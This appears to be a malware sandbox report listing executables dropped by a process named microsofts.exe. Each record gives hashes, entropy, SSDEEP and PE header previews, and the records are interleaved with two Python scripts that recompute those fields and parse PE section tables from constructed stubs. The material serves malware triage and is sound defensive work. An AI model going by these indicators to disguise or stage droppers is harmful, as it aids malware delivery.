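To check a real artifact, read it with `open(path, "rb").read()` and compare `describe()` output with the SHA-256 and File Type listed in the corresponding record; a hash mismatch with a matching File Type and similar size usually means a polymorphic rebuild of the same dropper rather than an unrelated file.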

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4364800
Entropy (8bit): 6.748482129645919
Encrypted: false
SSDEEP: 49152:cB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8E4Dmg27RnWGj:WHzorVmr2ZkRpdJYolCD527BWG
MD5: E8AE9BC8F9C727900E882FF08D147914
SHA1: EE3CB30C64D42F5A17AAAE4730F1A8BE7A26DDDE
SHA-256: 99932A84D5F16DF51134792A11C1665E1484D3730F3542096F4C2A55E37E137E
SHA-512: FA00F14C309639723108A385A6695AEBBEFCD1834433AD848E834EE745D850988A72648C3BBCADF5DE806EEF8E56D8FECBB5F1A04ADBB1538156E068555E0753
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1238528
Entropy (8bit): 5.146949379214972
Encrypted: false
SSDEEP: 12288:E3w1uVdSEj/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:EEyT/sqjnhMgeiCl7G0nehbGZpbD
MD5: DA20F721C754A0E7A672962EA1D557DD
SHA1: FA51E5FCCE7747DD494783DC2814352D82DD8AC9
SHA-256: F7AB7DCAEEA6C50C5DCB0D174244A0269AB4F51174A9B70FF91D139CBCB25548
SHA-512: FD53717F1B58C052CDC9B59F1353F9F8472D128CF482A9DCC357BF638145CEF623E469E04C0C96126EF5DC4F7379B8202F12FA91924BFB9C3C97A5C0B25CE232
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2354176
Entropy (8bit): 7.049971783149608
Encrypted: false
SSDEEP: 49152:+hDdVrQ95RW0YEHyWQXE/09Val0GDDmg27RnWGj:+hHYW+HyWKED527BWG
MD5: AB5074630045AB26B71225715D67B7F6
SHA1: 1D9BB524B39E60B5F873235012E3DBE5C8BF1B65
SHA-256: FBDA3042764CD88A241A0AE684D7F307D6EAEA834E2DDFFDA93314A3338E069B
SHA-512: A870A21DE34EE629623268953FB51A704A051623128E8426918EEF33D2D5D9A1AC414368CCB3DF7FA28A9137090901219081B99A33C5E705F69346403C7F4AD6
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1825280
Entropy (8bit): 7.158493615955856
Encrypted: false
SSDEEP: 24576:470E0ZCQZMiU6Rrt9RoctGfmdd8sqjnhMgeiCl7G0nehbGZpbD:s0EzQSyRPRoc1kDmg27RnWGj
MD5: 6D7D89E332FA347DC99575840ADDC68B
SHA1: 6EE1952A76A62F0E36C1A4C178238445E39915CD
SHA-256: 8F56B6D65F2F5F441F282BCDC917B5BAFB66956EA4B11B2F93FFE16EE4E8B8D0
SHA-512: 16486C3D8BEB1F36A797D90C2567383E5E97830FA56739A9D502E74BC8DDE0A4B890E3803AF22ABF24C5430ACD0F84558C9FF21CDBF812DCD7C51716032777A9
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1847808
Entropy (8bit): 7.1454890118593
Encrypted: false
SSDEEP: 24576:1iD2VmA1YXwHwlklb8boUuWPg2gTsqjnhMgeiCl7G0nehbGZpbD:ED2VmAyiwIb8boQYDmg27RnWGj
MD5: 314F77D1BB740FD6B9DC27BA42F0EECC
SHA1: 8236A417D71D3EFD096BE96EA2F62E42B82DE726
SHA-256: AC2EEEAC94E3C9E8FB99E34B5DD906B56FE5C178DFC13DC3FBBB5B29BB516EC4
SHA-512: 03CA8C0D584CB632F2628B3D6ED7FBF594D8B1D8CFA29FEE3AC72580B545467596AEC84B9B05795407AE55FB837AA71599C080BBE6BA65F08F395C511B227DD1
Malicious: true
Reputation: unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.950750910981721
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:GfD3zO9ZhBGloizM3HRNr00ADmg27RnWGj:cDaalxzM00AD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:22A283736C3624A718FD7DCCDB239FB9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D60691EF6DE08C203C63C8D956B4FE83037C9399
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6687D0E7CD9D40945A1FE2F19AA285335CB1A2A63EC61E19C23A34D79DB174CC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:10DB5C9814F8A810EE37945DD9A3CBF5B13BD29E1F21198396A29C93AD9D5DBF5C9BABADEC1CF2A4B0CA5BB700348D15683D87FE64FB686B63159F725C051EF6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.......+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.824613592540457
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:uTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhrDmg27RnN:BI72LvkrDpbxJRoIMoD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C88BF6ACFD0A07A8EDC35673F2F35109
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:80905B1C4C0625CA4090DDF12E2E88788346D33C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1A8350CCFABFD330D12A36B6E5A737DF44E527949CA47BDFA5F576E415BDE8B4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C65E19F2E710D42106A592366D337C0A70DFBD04383254580EF471717EB4D464E671221975DF6CA32CBE5ACD6E35195F311E9DD1695696594F42D9F298F7F663
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.097242428032111
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:gW9Jml9mmijviMnF+ZxmQWcbLw8VMsqjnhMgeiCl7G0nehbGZpbD:gWnm5iOMkjmQWkV4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:21B67034B4B5072C44CF262034864BD1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F2964DF9ACB8C7F21A168AC31645872AD2DCA252
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CFCB92956428B5C694A1AA29B9937C4768FECDFB46FDE6DBB1844A4CC4C5C71D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D630314E411ABC2AFD704C6CACD946350141CB9269EDB1BBAD99EFB7D12FAC12072BB617F2A1CE31A632F727DFAEE6D2A25BDC2D2D67D245217D169424D30602
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....p1 ... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.166372263973913
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:twNHwoYhua6MtjRO4qbBJTY6mY1uIg2sqjnhMgeiCl7G0nehbGZpbD:twNPdQO7BJTfmE9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B2CB590C0059C8305900CA0E72A7ED62
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0CC8FECA33D5DA6685B649ADDC6FF29412A606D8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:19691BD13B87BF4947009FDBA64B7BFB8836F678EFB9806AE448564BCE389530
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:167E50779B628E0FF6E9FE945A4D706F31BC22AC5F5EC9D169CB840EE8831629D2E3F8E2C3CA377F3A521142B1D840ED08B56B4EC23ADF055F051DA39B139BFE
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
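The dropped-file records above each carry a size, an 8-bit entropy, a libmagic-style file type, and MD5/SHA1/SHA-256/SHA-512 digests. The following is an added example, not Joe Sandbox's code, showing how those fields are derived from raw bytes so an analyst can reproduce them for a file in hand (to confirm it is the same dropped artifact) and can read a section table like the one visible in the Preview fields (.text, .rdata, .tls, LZMADEC, CPADinfo). The PE32+ image it analyses is a constructed header-only stub, not one of the real dropped files; ssdeep is omitted because it needs an external library.

```python
import hashlib
import math
import struct

# Added example (not Joe Sandbox code): recompute the per-file fields shown in the
# dropped-file records from raw bytes. ssdeep is omitted: it needs an external library.

MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64", 0xAA64: "Aarch64"}
MAGICS = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEMS = {1: "native", 2: "GUI", 3: "console"}


def file_hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA-256/SHA-512 in the upper-case hex form the report uses."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0); packed or encrypted payloads sit near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_file_type(data: bytes):
    """Return (libmagic-style description, section names) for a PE image, else raise ValueError."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    # Subsystem sits at optional-header offset 68 in both the PE32 and PE32+ layouts
    subsystem = struct.unpack_from("<H", data, opt_off + 68)[0]
    kind = "DLL" if chars & 0x2000 else "executable"
    desc = "{} {} ({}) {}, for MS Windows".format(
        MAGICS.get(magic, hex(magic)), kind,
        SUBSYSTEMS.get(subsystem, "subsystem %d" % subsystem),
        MACHINES.get(machine, hex(machine)))
    sec_off = opt_off + opt_size
    names = []
    for i in range(nsec):  # 40-byte IMAGE_SECTION_HEADER entries; the name is the first 8 bytes
        raw = data[sec_off + 40 * i: sec_off + 40 * i + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return desc, names


def analyze(data: bytes) -> dict:
    """Build a record with the same field names as the report's dropped-file entries."""
    report = {"Size (bytes)": len(data), "Entropy (8bit)": entropy_8bit(data)}
    try:
        report["File Type"], report["Sections"] = pe_file_type(data)
    except ValueError:
        report["File Type"], report["Sections"] = "data", []
    report.update(file_hashes(data))
    return report


def build_sample_pe(section_names) -> bytes:
    """Constructed, non-runnable PE32+ GUI stub (hypothetical test input, not a real dropped file)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 240  # standard PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, opt_size, 0x0022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)  # IMAGE_NT_OPTIONAL_HDR64_MAGIC
    struct.pack_into("<H", opt, 68, 2)     # IMAGE_SUBSYSTEM_WINDOWS_GUI
    secs = b"".join(n.encode("ascii").ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + bytes(opt) + secs


if __name__ == "__main__":
    sample = build_sample_pe([".text", ".rdata", ".data", ".tls", "LZMADEC", "CPADinfo"])
    for k, v in analyze(sample).items():
        print("%s: %s" % (k, v))
```

To compare a file against the records, run analyze() on its bytes and match the SHA-256 field; the entropy values near 7 in the records are consistent with compressed or packed content, and the LZMADEC section name seen in two previews points the same way.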
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1847808
Entropy (8bit): 7.145485109807925
Encrypted: false
SSDEEP: 24576:oiD2VmA1YXwHwlklb8boUuWPg2gTsqjnhMgeiCl7G0nehbGZpbD:bD2VmAyiwIb8boQYDmg27RnWGj
MD5: B4839581D0118B76CE7AD1FD83482050
SHA1: 8714FE9FD3E2251C1AB44A59C3F7338E62E43BF2
SHA-256: DC339EB3724800FB8EE0AC959AABBAA4DC75B8377D8F23C42A995D11BBB8B9E0
SHA-512: 68D3AF23F910C13994E3F68F3AB4B60469AC9C90C3FE21147FB0A8ECC54BC434AC1A40D7F90A55E765F39248AA1CE0814DEC763F020CC652312133C37F6F28E4
Malicious: true
Reputation: unknown
Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......$.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
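The "File Type", "Entropy (8bit)" and "Preview" fields above are all derived directly from the dropped file's bytes, and it is worth being able to reproduce them offline before trusting a third-party verdict. The following is an added example (not part of the sandbox report, and not code from any tool the report names): it walks the DOS header, PE signature, COFF header, optional header and section table with the standard library, computes the 8-bit Shannon entropy, and renders the bytes the way the Preview field does. The sample PE it builds is a constructed header-only stub carrying the section names seen in the previews (`.00cfg`, `.gxfg`, `.retplne`, `malloc_h`, ...); it is not one of the dropped files and is not runnable code.

```python
import math
import struct
from collections import Counter

# Constants from the PE/COFF specification (Microsoft "PE Format").
MACHINE = {0x014C: "Intel 80386", 0x8664: "x86-64", 0xAA64: "ARM64"}
OPT_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEM = {2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (the report's "Entropy (8bit)")."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def preview(data: bytes, limit: int = 1024) -> str:
    """Render bytes like the report's Preview field: printable ASCII is kept,
    every other byte becomes a dot."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:limit])


def parse_pe(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> optional header -> sections.
    Returns the fields the report's File Type line is built from."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    # Subsystem sits at optional-header offset 68 for both PE32 and PE32+.
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i          # section headers are 40 bytes each
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": name, "vaddr": vaddr, "rawsize": rawsize, "rawptr": rawptr})
    return {
        "format": OPT_MAGIC.get(magic, f"unknown(0x{magic:X})"),
        "machine": MACHINE.get(machine, f"unknown(0x{machine:04X})"),
        "subsystem": SUBSYSTEM.get(subsystem, f"subsystem {subsystem}"),
        "dll": bool(characteristics & IMAGE_FILE_DLL),
        "sections": sections,
    }


def file_type_string(info: dict) -> str:
    """Format like the report, e.g. 'PE32+ executable (GUI) x86-64, for MS Windows'."""
    kind = "DLL" if info["dll"] else "executable"
    return f"{info['format']} {kind} ({info['subsystem']}) {info['machine']}, for MS Windows"


def build_sample_pe() -> bytes:
    """Constructed header-only PE32+ stub (not one of the dropped files) with the
    section names visible in the report's previews. Not runnable code."""
    names = [b".text", b".rdata", b".data", b".pdata", b".00cfg", b".gxfg",
             b".retplne", b".tls", b"_RDATA", b"malloc_h", b".rsrc", b".reloc"]
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)            # e_lfanew -> PE signature
    opt_size = 240                                       # PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, len(names), 0, 0, 0, opt_size,
                       0x0022)                           # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)                # PE32+ magic
    struct.pack_into("<H", opt, 68, 2)                   # IMAGE_SUBSYSTEM_WINDOWS_GUI
    table = b"".join(
        n.ljust(8, b"\0")
        + struct.pack("<IIII", 0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i)
        + b"\0" * 16
        for i, n in enumerate(names))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    blob = build_sample_pe()
    info = parse_pe(blob)
    print("File Type:", file_type_string(info))
    print("Entropy (8bit):", round(shannon_entropy(blob), 6))
    print("Sections:", ", ".join(s["name"] for s in info["sections"]))
    print("Preview:", preview(blob, 200))
```

Run it against the real dropped files (`parse_pe(open(path, "rb").read())`) to confirm that the machine type, subsystem and section list match what the sandbox reported; an entropy close to 8 for a non-packed section, or a section whose raw data extends past the end of the file, is the kind of discrepancy worth a second look.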
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1801216
Entropy (8bit): 7.166368227577133
Encrypted: false
SSDEEP: 24576:rwNHwoYhua6MtjRO4qbBJTY6mY1uIg2sqjnhMgeiCl7G0nehbGZpbD:rwNPdQO7BJTfmE9Dmg27RnWGj
MD5: B25467628441BB5C68FD27C6478F9840
SHA1: 6005C0F62305AF32457FA076EC5439DB2AD86911
SHA-256: 5C01D4A2EF739AC9C795FF0F2D9C5B991EAC7DBAE186B6B18F486B9962C46A3B
SHA-512: F91E4FA4B28DB49D28F95E9700AE4A5A0F604C65A4A1E46F908E89322316EDD3B0F225D3FD919DBDDEDA041B187726542CE4F4AC299BEEB4F31A248AE1F31054
Malicious: true
Reputation: unknown
Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1325568
Entropy (8bit): 5.1418728080205085
Encrypted: false
SSDEEP: 24576:a4lbht6BHtsqjnhMgeiCl7G0nehbGZpbD:blNtqHRDmg27RnWGj
MD5: 4E7A7A22E35EEAE924D2896095C48B6D
SHA1: 20DF1E9CCD9CA9FAA4EA0A921B7B70A2E4902841
SHA-256: F25D291DCF305866B28106828CED9D4A322A45830FA4D419CF0B6CB2DDABB21D
SHA-512: 90CF3194D812E29392A6B58F7E8297F9B4A1256A4BD96CD366737B78A4CC7BE3A940260CE963E07357D78D8D24629FCDACBB08DAF3FEFF16F13FF65013CD75E3
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................U.......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1221120
Entropy (8bit): 5.13887056105472
Encrypted: false
SSDEEP: 12288:PIkOkTB+w5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:PIxkTBV5sqjnhMgeiCl7G0nehbGZpbD
MD5: 664FACE68FE3811FA50B87C45742BC26
SHA1: D80324E2655E3EB97BC56942061288CB45A7F41A
SHA-256: 300C114E1271486FEAC4E1E20E732727F3E90AB6F351509E13A4958259FC7E26
SHA-512: 48F03A5B62D1FFE51F3AE9A9B13667198841B7017A27B05FEACFFF3754771BB3093887BAC19734A303B9EE99D96F84591F56D5BABD74BF930426BBD505165915
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................{.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1335296
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.236795234359163
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
SSDEEP:12288:B4lssmroCOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:BcssmrAsqjnhMgeiCl7G0nehbGZpbD
MD5:9A6940D22DFB1C84B34264101C78744B
SHA1:58813EA95ECBD1ECC4583442BAB7ACF81C1EBB0D
SHA-256:097C27298054D442B46DC4DD735896F76677746DF5BA214E610140AD1DC4F2CA
SHA-512:F87B1A96DD29227CFFD4BE15E73D7C7D9191B252DAA5F6347FEE03DC0499F8066D5AC09A81AE99B92B00718FF8ABD04E081FEE9AE4FDCACCB1299B877D1ABF7B
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1383936
Entropy (8bit):5.338543541842544
Encrypted:false
SSDEEP:24576:203cT++foSBWU2Yxhkg3sqjnhMgeiCl7G0nehbGZpbD:t3cK+foQWU2YnPLDmg27RnWGj
MD5:6DD8ADC2FC1E2C512EEA02E75F8AECFA
SHA1:EF878C0076CC958466B21C9CEC637D80107652B6
SHA-256:347857ECA9081661E4ED6458C9FE0BF47D64EB765D1587DC532DB3378439FF16
SHA-512:68DD3228F95AD3B8B1F7C4807DBF118ED69992B2C9C8874E3C55F863882358FF5112156ADD179F3A2CDFB80B5850F19D1F0B3F6F16965CC4FBEB7CABFFA813B5
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1221120
Entropy (8bit):5.1389244527142015
Encrypted:false
SSDEEP:12288:bbrNRzB+NXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:bbBRzBgXsqjnhMgeiCl7G0nehbGZpbD
MD5:68DDD564181534B75162527DF8F73E7D
SHA1:F2C00E9D7DD727A7C6FCEB71DCC8ABF3EB5EF35A
SHA-256:E90778C49F6C392FEA5969A14D9555CE55C1DA96E03810678E0B9D1F7C047660
SHA-512:DB1B5FE39ED21503991599E1F1C9EAAFF2AB16159354135E207A8BF8DF7D067ECEAC6277EA651D0996D625CFDD170CFB64D4A6A879E888DA2FF930DD13B6D47E
